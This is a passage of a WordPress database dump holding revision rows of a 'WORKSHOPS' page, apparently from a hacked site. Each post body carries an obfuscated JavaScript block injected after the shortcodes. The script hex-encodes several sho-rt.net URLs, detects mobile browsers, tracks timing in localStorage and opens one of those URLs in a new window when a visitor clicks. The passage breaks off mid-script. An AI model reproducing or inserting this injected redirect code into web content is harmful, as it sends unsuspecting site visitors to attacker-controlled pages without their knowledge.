_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','WORKSHOPS','','inherit','closed','closed','','2372-revision-v1','','','2023-02-02 07:13:08','2023-02-02 07:13:08','',2372,'https://gsw2023.com/?p=3678',0,'revision','',0),
(3679,1,'2023-02-02 07:15:39','2023-02-02 07:15:39','<p>[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"14\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','WORKSHOPS','','inherit','closed','closed','','2372-revision-v1','','','2023-02-02 07:15:39','2023-02-02 07:15:39','',2372,'https://gsw2023.com/?p=3679',0,'revision','',0),
(3680,1,'2023-02-02 07:17:43','2023-02-02 07:17:43','<p>[vc_row][vc_column][dt_portfolio_masonry image_border_radius=\"0px\" project_icon_border_width=\"0px\" posts_offset=\"0\" category=\"69\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 